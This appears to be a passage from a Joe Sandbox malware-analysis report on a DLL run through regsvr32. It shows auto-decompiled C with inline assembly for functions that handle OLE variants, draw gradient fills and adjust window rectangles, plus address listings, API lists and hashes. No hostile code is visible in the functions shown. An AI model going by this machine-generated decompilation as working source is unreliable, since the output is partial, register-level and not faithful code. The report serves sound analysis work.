						_push(_t195 - 0x44);
						_push( *(_t195 - 0x18));
						_push(_t193);
						_t140 = E1002C7EC(0,  *((intOrPtr*)(_t195 - 0x34)), _t187, _t193, __eflags);
						__eflags = _t140;
						 *(_t195 - 0x18) = _t140;
						if(_t140 != 0) {
							L26:
							_t191 =  *(_t195 + 0x14);
							_t187 = 0;
							__eflags =  *(_t191 + 8);
							if( *(_t191 + 8) <= 0) {
								L29:
								__eflags =  *(_t195 - 0x18);
								_t179 = _t195 - 0x58;
								if( *(_t195 - 0x18) == 0) {
									E1002C74F(_t179);
									_t142 =  *(_t195 + 0x10);
									__eflags = _t142;
									if(_t142 == 0) {
										_t144 = ( *(_t195 - 0x24) & 0x0000ffff) - 8;
										__eflags = _t144;
										if(_t144 == 0) {
											__imp__#6(_t173);
											L52:
											 *(_t195 - 4) = 0;
											E1001663E(_t195 - 0x58);
											 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
											__eflags =  *(_t195 - 0x2c);
											if( *(_t195 - 0x2c) != 0) {
												_push( *((intOrPtr*)(_t195 - 0x30)));
												_push(0);
												E10022A6E();
											}
											__eflags = 0;
											goto L55;
										}
										_t148 = _t144 - 1;
										__eflags = _t148;
										if(_t148 == 0) {
											L48:
											__eflags = _t173;
											if(_t173 != 0) {
												 *((intOrPtr*)( *_t173 + 8))(_t173);
											}
											goto L52;
										}
										_t151 = _t148 - 3;
										__eflags = _t151;
										if(_t151 == 0) {
											__imp__#9(_t195 - 0x44);
											goto L52;
										}
										__eflags = _t151 != 1;
										if(_t151 != 1) {
											goto L52;
										}
										goto L48;
									}
									_t181 =  *(_t195 - 0x24);
									 *_t142 = _t181;
									_t183 = (_t181 & 0x0000ffff) + 0xfffffffe;
									__eflags = _t183 - 0x13;
									if(_t183 > 0x13) {
										goto L52;
									}
									switch( *((intOrPtr*)(_t183 * 4 +  &M1002CDE4))) {
										case 0:
											L41:
											 *(__eax + 8) = __bx;
											goto L52;
										case 1:
											 *(__eax + 8) = __ebx;
											goto L52;
										case 2:
											 *(__eax + 8) =  *(__ebp - 0x44);
											goto L52;
										case 3:
											 *(__eax + 8) =  *(__ebp - 0x44);
											goto L52;
										case 4:
											__ecx =  *(__ebp - 0x44);
											 *(__eax + 8) =  *(__ebp - 0x44);
											__ecx =  *(__ebp - 0x40);
											 *(__eax + 0xc) = __ecx;
											goto L52;
										case 5:
											__bx =  ~__bx;
											asm("sbb ebx, ebx");
											goto L41;
										case 6:
											__esi = __ebp - 0x44;
											__edi = __eax;
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
											goto L52;
										case 7:
											goto L52;
										case 8:
											_t142[4] = _t173;
											goto L52;
									}
								}
								 *(_t195 - 4) = 0;
								E1001663E(_t179);
								 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
								__eflags =  *(_t195 - 0x2c);
								if( *(_t195 - 0x2c) != 0) {
									_push( *((intOrPtr*)(_t195 - 0x30)));
									_push(0);
									E10022A6E();
								}
								goto L55;
							}
							do {
								__imp__#9( *(_t195 - 0x1c));
								 *(_t195 - 0x1c) =  &(( *(_t195 - 0x1c))[0x10]);
								_t187 = _t187 + 1;
								__eflags = _t187 -  *(_t191 + 8);
							} while (_t187 <  *(_t191 + 8));
							goto L29;
						}
						_t158 =  *(_t195 - 0x24) & 0x0000ffff;
						__eflags = _t158 - 4;
						_push(_t187);
						_push(_t193);
						_push( *(_t195 - 0x28));
						 *(_t195 - 4) = 2;
						if(_t158 == 4) {
							E1003854D();
							 *((intOrPtr*)(_t195 - 0x34)) = _t204;
							 *((intOrPtr*)(_t195 - 0x44)) =  *((intOrPtr*)(_t195 - 0x34));
							L25:
							 *(_t195 - 4) = 1;
							goto L26;
						}
						__eflags = _t158 - 5;
						if(_t158 == 5) {
							L23:
							E1003854D();
							 *((long long*)(_t195 - 0x44)) = _t204;
							goto L25;
						}
						__eflags = _t158 - 7;
						if(_t158 == 7) {
							goto L23;
						}
						__eflags = _t158 + 0xffffffec - 1;
						if(_t158 + 0xffffffec > 1) {
							_t173 = E1003854D();
						} else {
							 *((intOrPtr*)(_t195 - 0x44)) = E1003854D();
							 *((intOrPtr*)(_t195 - 0x40)) = _t185;
						}
						goto L25;
					}
					L12:
					 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
					__eflags =  *(_t195 - 0x2c) - _t187;
					if( *(_t195 - 0x2c) == _t187) {
						goto L7;
					}
					_push( *((intOrPtr*)(_t195 - 0x30)));
					_push(_t187);
					goto L6;
				}
				_t19 = _t190 + 3; // 0x3
				_t187 = _t19;
				if(E100151B0(_t185, _t201, _t19) != 0) {
					E1003CBD0(_t187);
					 *(_t195 - 0x10) = _t196;
					_t188 = _t196;
					_t26 = _t190 + 3; // 0x3
					E100161B4(_t188, _t190, _t195, _t188, _t26,  *(_t195 - 0x18), _t190);
					_t169 = _t173[0xc] & 0x0000ffff;
					_t196 =  &(_t196[0x10]);
					__eflags = _t169 - 8;
					 *(_t195 - 0x18) = _t188;
					if(_t169 == 8) {
						_t169 = 0xe;
					}
					 *(_t195 - 0x24) =  *(_t195 - 0x24) & 0x00000000;
					_t188[_t190] = 0xff;
					_t194 = _t190 + 1;
					_t188[_t194] = _t169;
					_t188[_t194 + 1] = 0;
					 *(_t195 - 0x28) = _t173[0x14];
					_t187 = 0;
					__eflags = 0;
					goto L11;
				}
				goto L4;
			}





























                                                                                                                0x1002cad4
                                                                                                                0x1002cad4
                                                                                                                0x1002cad4
                                                                                                                0x1002cadb
                                                                                                                0x1002cae0
                                                                                                                0x1002cae9
                                                                                                                0x1002caee
                                                                                                                0x1002caf1
                                                                                                                0x1002caf4
                                                                                                                0x1002caf8
                                                                                                                0x1002cafb
                                                                                                                0x1002caff
                                                                                                                0x1002cb02
                                                                                                                0x1002cb07
                                                                                                                0x1002cb07
                                                                                                                0x1002cb0d
                                                                                                                0x1002cb13
                                                                                                                0x1002cb17
                                                                                                                0x1002cb1c
                                                                                                                0x1002cb23
                                                                                                                0x1002cb26
                                                                                                                0x1002cb9a
                                                                                                                0x1002cb9a
                                                                                                                0x1002cba4
                                                                                                                0x1002cba9
                                                                                                                0x1002cbab
                                                                                                                0x1002cbac
                                                                                                                0x1002cbbd
                                                                                                                0x1002cbc0
                                                                                                                0x1002cbc6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002cbc8
                                                                                                                0x1002cbcd
                                                                                                                0x1002cbd2
                                                                                                                0x1002cbd5
                                                                                                                0x1002cbdd
                                                                                                                0x1002cbe2
                                                                                                                0x1002cbf0
                                                                                                                0x1002cbf2
                                                                                                                0x1002cbf2
                                                                                                                0x1002cbf6
                                                                                                                0x1002cbfb
                                                                                                                0x1002cbfe
                                                                                                                0x1002cb36
                                                                                                                0x1002cb36
                                                                                                                0x1002cb3e
                                                                                                                0x1002cb4a
                                                                                                                0x1002cdd7
                                                                                                                0x1002cddf
                                                                                                                0x1002cddf
                                                                                                                0x1002cb40
                                                                                                                0x1002cb43
                                                                                                                0x1002cb45
                                                                                                                0x1002cb45
                                                                                                                0x00000000
                                                                                                                0x1002cb45
                                                                                                                0x1002cc06
                                                                                                                0x1002cc0b
                                                                                                                0x1002cc0e
                                                                                                                0x1002cc10
                                                                                                                0x1002cc12
                                                                                                                0x1002cc19
                                                                                                                0x1002cc1c
                                                                                                                0x1002cc1f
                                                                                                                0x1002cc22
                                                                                                                0x1002cc2b
                                                                                                                0x1002cc2c
                                                                                                                0x1002cc32
                                                                                                                0x1002cc35
                                                                                                                0x1002cc39
                                                                                                                0x1002cc3c
                                                                                                                0x1002cc3f
                                                                                                                0x1002cc40
                                                                                                                0x1002cc43
                                                                                                                0x1002cc44
                                                                                                                0x1002cc49
                                                                                                                0x1002cc4b
                                                                                                                0x1002cc4e
                                                                                                                0x1002cca9
                                                                                                                0x1002cca9
                                                                                                                0x1002ccac
                                                                                                                0x1002ccae
                                                                                                                0x1002ccb1
                                                                                                                0x1002cccc
                                                                                                                0x1002cccc
                                                                                                                0x1002ccd0
                                                                                                                0x1002ccd3
                                                                                                                0x1002cd20
                                                                                                                0x1002cd25
                                                                                                                0x1002cd28
                                                                                                                0x1002cd2a
                                                                                                                0x1002cd86
                                                                                                                0x1002cd86
                                                                                                                0x1002cd89
                                                                                                                0x1002cdaf
                                                                                                                0x1002cdb5
                                                                                                                0x1002cdb8
                                                                                                                0x1002cdbc
                                                                                                                0x1002cdc1
                                                                                                                0x1002cdc5
                                                                                                                0x1002cdc9
                                                                                                                0x1002cdcb
                                                                                                                0x1002cdce
                                                                                                                0x1002cdd0
                                                                                                                0x1002cdd0
                                                                                                                0x1002cdd5
                                                                                                                0x00000000
                                                                                                                0x1002cdd5
                                                                                                                0x1002cd8b
                                                                                                                0x1002cd8b
                                                                                                                0x1002cd8c
                                                                                                                0x1002cd96
                                                                                                                0x1002cd96
                                                                                                                0x1002cd98
                                                                                                                0x1002cd9d
                                                                                                                0x1002cd9d
                                                                                                                0x00000000
                                                                                                                0x1002cd98
                                                                                                                0x1002cd8e
                                                                                                                0x1002cd8e
                                                                                                                0x1002cd91
                                                                                                                0x1002cda6
                                                                                                                0x00000000
                                                                                                                0x1002cda6
                                                                                                                0x1002cd93
                                                                                                                0x1002cd94
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002cd94
                                                                                                                0x1002cd2c
                                                                                                                0x1002cd2f
                                                                                                                0x1002cd35
                                                                                                                0x1002cd38
                                                                                                                0x1002cd3b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002cd3d
                                                                                                                0x00000000
                                                                                                                0x1002cd6c
                                                                                                                0x1002cd6c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002cd7d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002cd5a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002cd62
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002cd49
                                                                                                                0x1002cd4c
                                                                                                                0x1002cd4f
                                                                                                                0x1002cd52
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002cd67
                                                                                                                0x1002cd6a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002cd72
                                                                                                                0x1002cd75
                                                                                                                0x1002cd77
                                                                                                                0x1002cd78
                                                                                                                0x1002cd79
                                                                                                                0x1002cd7a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002cd44
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002cd3d
                                                                                                                0x1002ccd5
                                                                                                                0x1002ccd9
                                                                                                                0x1002ccde
                                                                                                                0x1002cce2
                                                                                                                0x1002cce6
                                                                                                                0x1002cce8
                                                                                                                0x1002cceb
                                                                                                                0x1002cced
                                                                                                                0x1002cced
                                                                                                                0x00000000
                                                                                                                0x1002ccf2
                                                                                                                0x1002ccb9
                                                                                                                0x1002ccbc
                                                                                                                0x1002ccc2
                                                                                                                0x1002ccc6
                                                                                                                0x1002ccc7
                                                                                                                0x1002ccc7
                                                                                                                0x00000000
                                                                                                                0x1002ccb9
                                                                                                                0x1002cc50
                                                                                                                0x1002cc54
                                                                                                                0x1002cc57
                                                                                                                0x1002cc58
                                                                                                                0x1002cc59
                                                                                                                0x1002cc5c
                                                                                                                0x1002cc60
                                                                                                                0x1002cc94
                                                                                                                0x1002cc99
                                                                                                                0x1002cc9f
                                                                                                                0x1002cca2
                                                                                                                0x1002cca2
                                                                                                                0x00000000
                                                                                                                0x1002cca2
                                                                                                                0x1002cc62
                                                                                                                0x1002cc65
                                                                                                                0x1002cc8a
                                                                                                                0x1002cc8a
                                                                                                                0x1002cc8f
                                                                                                                0x00000000
                                                                                                                0x1002cc8f
                                                                                                                0x1002cc67
                                                                                                                0x1002cc6a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002cc6f
                                                                                                                0x1002cc72
                                                                                                                0x1002cc86
                                                                                                                0x1002cc74
                                                                                                                0x1002cc79
                                                                                                                0x1002cc7c
                                                                                                                0x1002cc7c
                                                                                                                0x00000000
                                                                                                                0x1002cc72
                                                                                                                0x1002cbae
                                                                                                                0x1002cbae
                                                                                                                0x1002cbb2
                                                                                                                0x1002cbb5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002cbb7
                                                                                                                0x1002cbba
                                                                                                                0x00000000
                                                                                                                0x1002cbba
                                                                                                                0x1002cb28
                                                                                                                0x1002cb28
                                                                                                                0x1002cb34
                                                                                                                0x1002cb56
                                                                                                                0x1002cb5b
                                                                                                                0x1002cb5e
                                                                                                                0x1002cb64
                                                                                                                0x1002cb69
                                                                                                                0x1002cb6e
                                                                                                                0x1002cb72
                                                                                                                0x1002cb75
                                                                                                                0x1002cb79
                                                                                                                0x1002cb7c
                                                                                                                0x1002cb80
                                                                                                                0x1002cb80
                                                                                                                0x1002cb81
                                                                                                                0x1002cb85
                                                                                                                0x1002cb89
                                                                                                                0x1002cb8a
                                                                                                                0x1002cb8d
                                                                                                                0x1002cb95
                                                                                                                0x1002cb98
                                                                                                                0x1002cb98
                                                                                                                0x00000000
                                                                                                                0x1002cb98
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 1002CADB
                                                                                                                • lstrlenA.KERNEL32(00000000,000000FF,00000050,1003709B,00000000,00000001,?,?,000000FF,?,?,?), ref: 1002CB0D
                                                                                                                  • Part of subcall function 100161B4: _memcpy_s.LIBCMT ref: 100161C4
                                                                                                                • _memset.LIBCMT ref: 1002CBDD
                                                                                                                • VariantClear.OLEAUT32(?), ref: 1002CCBC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4021759052-0
                                                                                                                • Opcode ID: 3b913bb3591ddde8af3c2de49f38e964adc0fa6ddb32f8b22ae52ae76205c4ad
                                                                                                                • Instruction ID: 6bb8f09ddf9af857769089a4c7cb701503405987a78ccbac62f9c74c842dc682
                                                                                                                • Opcode Fuzzy Hash: 3b913bb3591ddde8af3c2de49f38e964adc0fa6ddb32f8b22ae52ae76205c4ad
                                                                                                                • Instruction Fuzzy Hash: 7DA16A3180024DDBCF11CFE4E885AEEBBB0FF05354FA1415AE915AB291D735AE41DBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000B7A0 Relevance: 9.2, APIs: 6, Instructions: 160COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 54%
                                                                                                                			E1000B7A0(signed int __edx, signed long long __fp0, signed int _a4, signed int _a8, signed char _a12, unsigned int _a16, signed int* _a20) {
				struct tagRECT _v28;
				long _v32;
				signed int _v36;
				signed long long _v40;
				signed long long _v44;
				unsigned int _t60;
				signed char _t62;
				int _t65;
				void* _t77;
				int _t80;
				struct HDC__* _t83;
				unsigned int _t84;
				long _t88;
				signed int _t89;
				int _t91;
				signed int _t98;
				signed int _t100;
				int* _t107;
				signed int _t110;
				int _t111;
				void* _t112;
				int _t114;
				signed long long _t124;
				signed long long _t125;
				signed long long _t126;

				_t107 = _a8;
				_t84 = _a16;
				asm("cdq");
				_a8 = (_t107[1] - _t107[3] ^ __edx) - __edx;
				asm("fild dword [esp+0x40]");
				asm("fidiv dword [eax]");
				_t60 = _a12;
				_t98 = _t60 & 0x000000ff;
				_a8 = (_t84 & 0x000000ff) - _t98;
				_t110 = _t60 & 0x000000ff;
				_t62 = _t60 >> 0x00000010 & 0x000000ff;
				_a16 = _t98;
				_a12 = _t110;
				_v44 = __fp0;
				asm("fild dword [esp+0x40]");
				_t124 = st0;
				_a8 = (_t84 & 0x000000ff) - _t110;
				asm("fdivp st2, st0");
				asm("fxch st0, st1");
				_v28.left = _t124;
				asm("fild dword [esp+0x40]");
				_a8 = (_t84 >> 0x00000010 & 0x000000ff) - _t62;
				_t88 = 0;
				_t125 = _t124 / st1;
				_v36 = _t125;
				asm("fild dword [esp+0x40]");
				_a8 = _t62;
				_t126 = _t125 / st1;
				_v44 = _t126;
				asm("fst qword [esp+0x20]");
				asm("fcomp qword [0x100582f0]");
				asm("fnstsw ax");
				if((_t62 & 0x00000001) == 0) {
					asm("fild dword [esp+0x40]");
					_t83 = _a4;
					_v40 = _t126;
					asm("fild dword [esp+0x48]");
					_v32 = _t126;
					asm("fldz");
					_a8 = _t126;
					asm("fild dword [esp+0x4c]");
					_a16 = _t126;
					do {
						_t100 =  *_a20;
						_t111 = _t107[1];
						_t114 = _t100 * _t88 + _t111;
						_t65 = _t107[3];
						if(_t114 >= _t65) {
							_t114 = _t65;
						}
						_t89 = _t88 + 1;
						_a4 = _t89;
						_t91 = _t89 * _t100 + _t111;
						if(_t91 < _t65) {
							_t65 = _t91;
						}
						SetRect( &(_v28.bottom),  *_t107, _t114, _t107[2] + 1, _t65);
						asm("fnstcw word [esp+0x44]");
						_a12 = _a8 & 0x0000ffff | 0x00000c00;
						asm("fldcw word [esp+0x48]");
						asm("fistp dword [esp+0x48]");
						asm("fldcw word [esp+0x44]");
						asm("fnstcw word [esp+0x44]");
						_a12 = _a8 & 0x0000ffff | 0x00000c00;
						asm("fldcw word [esp+0x48]");
						asm("fistp dword [esp+0x48]");
						asm("fldcw word [esp+0x44]");
						asm("fnstcw word [esp+0x44]");
						_a12 = _a8 & 0x0000ffff | 0x00000c00;
						asm("fldcw word [esp+0x48]");
						asm("fistp dword [esp+0x48]");
						asm("fldcw word [esp+0x44]");
						_t112 = CreateSolidBrush(0 << 0x00000008 | _a12 & 0xff);
						_t77 = SelectObject(_t83, _t112);
						FillRect(_t83,  &_v28, _t112);
						SelectObject(_t83, _t77);
						_t80 = DeleteObject(_t112);
						_t88 = _v32;
						_v28.left = _t88;
						asm("fild dword [esp+0x44]");
						_v28.left = (st0 * _v36 + _v32) * _v28.left + _a16;
						asm("fcomp qword [esp+0x24]");
						asm("fnstsw ax");
					} while ((_t80 & 0x00000041) != 0);
					return _t80;
				}
				return _t62;
			}




























                                                                                                                0x1000b7a6
                                                                                                                0x1000b7b0
                                                                                                                0x1000b7b4
                                                                                                                0x1000b7b9
                                                                                                                0x1000b7c1
                                                                                                                0x1000b7cb
                                                                                                                0x1000b7cd
                                                                                                                0x1000b7d1
                                                                                                                0x1000b7d6
                                                                                                                0x1000b7da
                                                                                                                0x1000b7e5
                                                                                                                0x1000b7ed
                                                                                                                0x1000b7f1
                                                                                                                0x1000b7f5
                                                                                                                0x1000b7f9
                                                                                                                0x1000b801
                                                                                                                0x1000b803
                                                                                                                0x1000b807
                                                                                                                0x1000b809
                                                                                                                0x1000b80b
                                                                                                                0x1000b80f
                                                                                                                0x1000b813
                                                                                                                0x1000b817
                                                                                                                0x1000b819
                                                                                                                0x1000b81b
                                                                                                                0x1000b81f
                                                                                                                0x1000b823
                                                                                                                0x1000b827
                                                                                                                0x1000b829
                                                                                                                0x1000b82d
                                                                                                                0x1000b831
                                                                                                                0x1000b837
                                                                                                                0x1000b83c
                                                                                                                0x1000b842
                                                                                                                0x1000b846
                                                                                                                0x1000b84b
                                                                                                                0x1000b84f
                                                                                                                0x1000b853
                                                                                                                0x1000b857
                                                                                                                0x1000b859
                                                                                                                0x1000b85d
                                                                                                                0x1000b861
                                                                                                                0x1000b865
                                                                                                                0x1000b869
                                                                                                                0x1000b86b
                                                                                                                0x1000b873
                                                                                                                0x1000b876
                                                                                                                0x1000b87b
                                                                                                                0x1000b87d
                                                                                                                0x1000b87d
                                                                                                                0x1000b87f
                                                                                                                0x1000b882
                                                                                                                0x1000b889
                                                                                                                0x1000b88d
                                                                                                                0x1000b88f
                                                                                                                0x1000b88f
                                                                                                                0x1000b8a2
                                                                                                                0x1000b8b4
                                                                                                                0x1000b8c6
                                                                                                                0x1000b8ca
                                                                                                                0x1000b8ce
                                                                                                                0x1000b8d9
                                                                                                                0x1000b8dd
                                                                                                                0x1000b8f1
                                                                                                                0x1000b8f9
                                                                                                                0x1000b8fd
                                                                                                                0x1000b907
                                                                                                                0x1000b912
                                                                                                                0x1000b924
                                                                                                                0x1000b928
                                                                                                                0x1000b92c
                                                                                                                0x1000b938
                                                                                                                0x1000b945
                                                                                                                0x1000b949
                                                                                                                0x1000b958
                                                                                                                0x1000b960
                                                                                                                0x1000b967
                                                                                                                0x1000b96d
                                                                                                                0x1000b971
                                                                                                                0x1000b975
                                                                                                                0x1000b979
                                                                                                                0x1000b981
                                                                                                                0x1000b985
                                                                                                                0x1000b987
                                                                                                                0x00000000
                                                                                                                0x1000b990
                                                                                                                0x1000b997

                                                                                                                APIs
                                                                                                                • SetRect.USER32 ref: 1000B8A2
                                                                                                                • CreateSolidBrush.GDI32(?), ref: 1000B93F
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 1000B949
                                                                                                                • FillRect.USER32(?,?,00000000), ref: 1000B958
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 1000B960
                                                                                                                • DeleteObject.GDI32(00000000), ref: 1000B967
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$RectSelect$BrushCreateDeleteFillSolid
                                                                                                                • String ID:
                                                                                                                • API String ID: 1259150129-0
                                                                                                                • Opcode ID: 556a1328d1479f7a36dde81f0125fedcab08b7a7c7c2b8213f2bdc4e0a279404
                                                                                                                • Instruction ID: daab91d1012a66d55df06bc0a81dbb7ee2f0c3a6e9f80726e18018d3c30e1492
                                                                                                                • Opcode Fuzzy Hash: 556a1328d1479f7a36dde81f0125fedcab08b7a7c7c2b8213f2bdc4e0a279404
                                                                                                                • Instruction Fuzzy Hash: 7751F071608311DFD3049F1AC68846BBBF8FBCA791F01891DFAD192265E336D864CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10039D19 Relevance: 9.1, APIs: 6, Instructions: 144COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 92%
                                                                                                                			E10039D19(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _t81;
				int _t83;
				int _t90;
				intOrPtr _t92;
				intOrPtr _t111;
				int _t125;
				void* _t134;
				void* _t139;
				intOrPtr _t143;
				void* _t145;
				void* _t149;

				_t145 = __edi;
				_t134 = __ecx;
				_t81 = _a4 -  *((intOrPtr*)(__ecx + 4));
				_t139 = _a8 -  *((intOrPtr*)(__ecx + 8));
				_t143 =  *((intOrPtr*)(__ecx + 0x8c));
				_t149 = 2;
				if(_t143 == 0xa) {
					L7:
					 *((intOrPtr*)(_t134 + 0x28)) =  *((intOrPtr*)(_t134 + 0x28)) + _t81;
					L9:
					_t83 =  *((intOrPtr*)(_t134 + 0x30)) -  *((intOrPtr*)(_t134 + 0x28));
					__eflags = _t83;
					L10:
					if(_t83 < 0) {
						_t83 = 0;
					}
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x68)))) + 0x138))( &_v12, _t83, _t149, _t145);
					_v44.left = GetSystemMetrics(0x4c);
					_v44.top = GetSystemMetrics(0x4d);
					_v44.right = GetSystemMetrics(0x4e) + _v44.left;
					_t90 = GetSystemMetrics(0x4f);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v44.bottom = _t90 + _v44.top;
					_t92 =  *((intOrPtr*)(_t134 + 0x8c));
					asm("movsd");
					if(_t92 == 0xa || _t92 == 0xc) {
						_v28.left =  *((intOrPtr*)(_t134 + 0x58)) -  *((intOrPtr*)(_t134 + 0x60)) - _v12 + _v28.right;
						_v28.top =  *((intOrPtr*)(_t134 + 0x5c)) -  *((intOrPtr*)(_t134 + 0x64)) - _v8 + _v28.bottom;
						__eflags = IntersectRect( &_v60,  &_v44,  &_v28);
						if(__eflags != 0) {
							 *((intOrPtr*)(_t134 + 0x38)) =  *((intOrPtr*)(_t134 + 0x40)) - _v12;
							_t111 =  *((intOrPtr*)(_t134 + 0x44)) - _v8;
							__eflags = _t111;
							 *((intOrPtr*)(_t134 + 0x3c)) = _t111;
							 *(_t134 + 0x48) = _v28.left;
							 *((intOrPtr*)(_t134 + 0x4c)) = _v28.top;
						}
					} else {
						_v28.right =  *((intOrPtr*)(_t134 + 0x60)) -  *((intOrPtr*)(_t134 + 0x58)) + _v28.left + _v12;
						_v28.bottom =  *((intOrPtr*)(_t134 + 0x64)) -  *((intOrPtr*)(_t134 + 0x5c)) + _v28.top + _v8;
						_t125 = IntersectRect( &_v60,  &_v44,  &_v28);
						_t162 = _t125;
						if(_t125 != 0) {
							 *((intOrPtr*)(_t134 + 0x40)) =  *((intOrPtr*)(_t134 + 0x38)) + _v12;
							 *((intOrPtr*)(_t134 + 0x44)) =  *((intOrPtr*)(_t134 + 0x3c)) + _v8;
							 *((intOrPtr*)(_t134 + 0x50)) = _v28.right;
							 *((intOrPtr*)(_t134 + 0x54)) = _v28.bottom;
						}
					}
					 *((intOrPtr*)(_t134 + 4)) = _a4;
					 *((intOrPtr*)(_t134 + 8)) = _a8;
					return E10039B0A(_t134, _t162, 0);
				}
				if(_t143 == 0xb) {
					__eflags = _t143 - 0xa;
					if(_t143 != 0xa) {
						_t14 = __ecx + 0x30;
						 *_t14 =  *((intOrPtr*)(__ecx + 0x30)) + _t81;
						__eflags =  *_t14;
						goto L9;
					}
					goto L7;
				} else {
					_t149 = 0x22;
					if(_t143 != 0xc) {
						_t8 = __ecx + 0x34;
						 *_t8 =  *((intOrPtr*)(__ecx + 0x34)) + _t139;
						__eflags =  *_t8;
					} else {
						 *((intOrPtr*)(__ecx + 0x2c)) =  *((intOrPtr*)(__ecx + 0x2c)) + _t139;
					}
					_t83 =  *((intOrPtr*)(_t134 + 0x34)) -  *((intOrPtr*)(_t134 + 0x2c));
					goto L10;
				}
			}



















                                                                                                                0x10039d19
                                                                                                                0x10039d23
                                                                                                                0x10039d2b
                                                                                                                0x10039d31
                                                                                                                0x10039d33
                                                                                                                0x10039d3e
                                                                                                                0x10039d3f
                                                                                                                0x10039d63
                                                                                                                0x10039d63
                                                                                                                0x10039d6b
                                                                                                                0x10039d6e
                                                                                                                0x10039d6e
                                                                                                                0x10039d71
                                                                                                                0x10039d73
                                                                                                                0x10039d75
                                                                                                                0x10039d75
                                                                                                                0x10039d83
                                                                                                                0x10039d95
                                                                                                                0x10039d9c
                                                                                                                0x10039da6
                                                                                                                0x10039da9
                                                                                                                0x10039db4
                                                                                                                0x10039db5
                                                                                                                0x10039db6
                                                                                                                0x10039db7
                                                                                                                0x10039dba
                                                                                                                0x10039dc3
                                                                                                                0x10039dc5
                                                                                                                0x10039e2c
                                                                                                                0x10039e3b
                                                                                                                0x10039e50
                                                                                                                0x10039e52
                                                                                                                0x10039e5a
                                                                                                                0x10039e60
                                                                                                                0x10039e60
                                                                                                                0x10039e63
                                                                                                                0x10039e69
                                                                                                                0x10039e6f
                                                                                                                0x10039e6f
                                                                                                                0x10039dcc
                                                                                                                0x10039dd8
                                                                                                                0x10039de7
                                                                                                                0x10039df6
                                                                                                                0x10039dfc
                                                                                                                0x10039dfe
                                                                                                                0x10039e06
                                                                                                                0x10039e0f
                                                                                                                0x10039e15
                                                                                                                0x10039e1b
                                                                                                                0x10039e1b
                                                                                                                0x10039dfe
                                                                                                                0x10039e75
                                                                                                                0x10039e7f
                                                                                                                0x10039e8a
                                                                                                                0x10039e8a
                                                                                                                0x10039d44
                                                                                                                0x10039d5e
                                                                                                                0x10039d61
                                                                                                                0x10039d68
                                                                                                                0x10039d68
                                                                                                                0x10039d68
                                                                                                                0x00000000
                                                                                                                0x10039d68
                                                                                                                0x00000000
                                                                                                                0x10039d46
                                                                                                                0x10039d4b
                                                                                                                0x10039d4c
                                                                                                                0x10039d53
                                                                                                                0x10039d53
                                                                                                                0x10039d53
                                                                                                                0x10039d4e
                                                                                                                0x10039d4e
                                                                                                                0x10039d4e
                                                                                                                0x10039d59
                                                                                                                0x00000000
                                                                                                                0x10039d59

                                                                                                                APIs
                                                                                                                Memory Dump Source
